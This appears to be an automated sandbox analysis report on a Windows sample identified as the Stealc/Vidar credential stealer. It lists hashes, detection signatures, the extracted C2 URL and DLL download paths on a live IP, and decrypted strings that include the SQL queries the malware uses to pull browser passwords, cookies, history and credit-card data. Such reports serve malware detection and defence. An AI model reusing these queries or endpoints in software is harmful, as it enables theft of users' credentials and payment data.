Windows Analysis Report
z2kQkLtyJW.exe

Overview

General Information

Sample name: z2kQkLtyJW.exe
renamed because original name is a hash value
Original sample name: fb7c0d8b2b78d313f0b6a821a076dd65.exe
Analysis ID: 1436393
MD5: fb7c0d8b2b78d313f0b6a821a076dd65
SHA1: ec7eb093f92ef8ef09feecd83d101b9c150f9552
SHA256: c867d9e400d87f94d2debce45faf45fb305597de3c5cb71a600d5dcf10ffa0f9
Tags: 32exeStealctrojan
Infos:

Detection

Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: 00000000.00000003.1965368943.0000000002C50000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.151/7043a0c6a68d9c65.php"}
Source: z2kQkLtyJW.exe.3756.0.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.172.128.151/7043a0c6a68d9c65.php"}
Source: 185.172.128.151/7043a0c6a68d9c65.php Virustotal: Detection: 18% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.php Virustotal: Detection: 18% Perma Link
Source: http://185.172.128.151/8420e83ceb95f3af/softokn3.dll Virustotal: Detection: 17% Perma Link
Source: http://185.172.128.151 Virustotal: Detection: 17% Perma Link
Source: http://185.172.128.151/8420e83ceb95f3af/sqlite3.dll Virustotal: Detection: 19% Perma Link
Source: http://185.172.128.151/8420e83ceb95f3af/freebl3.dll Virustotal: Detection: 6% Perma Link
Source: http://185.172.128.151/8420e83ceb95f3af/msvcp140.dll Virustotal: Detection: 6% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.php( Virustotal: Detection: 10% Perma Link
Source: http://185.172.128.151/7043a0c6a68d9c65.phpH Virustotal: Detection: 14% Perma Link
Source: http://185.172.128.151/8420e83ceb95f3af/mozglue.dll Virustotal: Detection: 6% Perma Link
Source: z2kQkLtyJW.exe ReversingLabs: Detection: 36%
Source: z2kQkLtyJW.exe Virustotal: Detection: 34% Perma Link
Source: z2kQkLtyJW.exe Joe Sandbox ML: detected
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetProcAddress
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: LoadLibraryA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: lstrcatA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: OpenEventA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CreateEventA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CloseHandle
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Sleep
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: VirtualFree
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetSystemInfo
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: VirtualAlloc
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: HeapAlloc
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetComputerNameA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: lstrcpyA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetProcessHeap
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetCurrentProcess
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: lstrlenA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: ExitProcess
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetSystemTime
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: advapi32.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: gdi32.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: user32.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: crypt32.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: ntdll.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetUserNameA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CreateDCA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetDeviceCaps
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: ReleaseDC
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: sscanf
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: VMwareVMware
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: HAL9TH
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: JohnDoe
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: DISPLAY
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: http://185.172.128.151
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: /7043a0c6a68d9c65.php
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: /8420e83ceb95f3af/
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: default100
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetFileAttributesA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GlobalLock
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: HeapFree
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetFileSize
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GlobalSize
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: IsWow64Process
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Process32Next
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetLocalTime
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: FreeLibrary
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Process32First
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: DeleteFileA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: FindNextFileA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: LocalFree
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: FindClose
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: LocalAlloc
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetFileSizeEx
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: ReadFile
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SetFilePointer
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: WriteFile
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CreateFileA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: FindFirstFileA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CopyFileA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: VirtualProtect
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetLastError
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: lstrcpynA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GlobalFree
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GlobalAlloc
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: OpenProcess
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: TerminateProcess
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: gdiplus.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: ole32.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: bcrypt.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: wininet.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: shlwapi.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: shell32.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: psapi.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SelectObject
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: BitBlt
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: DeleteObject
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GdiplusStartup
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GdiplusShutdown
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GdipDisposeImage
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GdipFree
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CoUninitialize
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CoInitialize
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CoCreateInstance
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: BCryptDecrypt
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: BCryptSetProperty
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetWindowRect
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetDesktopWindow
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetDC
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CloseWindow
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: wsprintfA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CharToOemW
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: wsprintfW
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: RegQueryValueExA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: RegCloseKey
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: RegEnumValueA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CryptUnprotectData
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: ShellExecuteExA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: InternetConnectA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: InternetCloseHandle
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: InternetOpenA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: HttpSendRequestA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: InternetReadFile
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: StrCmpCA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: StrStrA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: StrCmpCW
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: PathMatchSpecA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: GetModuleFileNameExA
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: RmStartSession
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: RmRegisterResources
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: RmGetList
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: RmEndSession
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: sqlite3_open
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: sqlite3_prepare_v2
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: sqlite3_step
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: sqlite3_column_text
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: sqlite3_finalize
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: sqlite3_close
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: sqlite3_column_bytes
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: sqlite3_column_blob
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: encrypted_key
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: PATH
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: NSS_Init
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: NSS_Shutdown
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: PK11_FreeSlot
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: PK11_Authenticate
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: PK11SDR_Decrypt
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: C:\ProgramData\
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: browser:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: profile:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: url:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: login:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: password:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Opera
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: OperaGX
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Network
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: cookies
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: .txt
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: TRUE
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: FALSE
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: autofill
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: history
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: name:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: month:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: year:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: card:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Cookies
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Login Data
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Web Data
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: History
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: logins.json
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: formSubmitURL
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: usernameField
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: encryptedUsername
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: encryptedPassword
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: guid
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: cookies.sqlite
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: formhistory.sqlite
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: places.sqlite
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: plugins
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Local Extension Settings
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Sync Extension Settings
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: IndexedDB
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Opera Stable
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Opera GX Stable
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: CURRENT
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: chrome-extension_
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Local State
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: profiles.ini
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: chrome
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: opera
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: firefox
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: wallets
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %08lX%04lX%lu
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: ProductName
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: ProcessorNameString
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: DisplayName
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: DisplayVersion
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: Network Info:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - IP: IP?
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Country: ISO?
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: System Summary:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - HWID:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - OS:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Architecture:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - UserName:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Computer Name:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Local Time:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - UTC:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Language:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Keyboards:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Laptop:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Running Path:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - CPU:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Threads:
Source: 0.3.z2kQkLtyJW.exe.2c50000.0.raw.unpack String decryptor: - Cores:
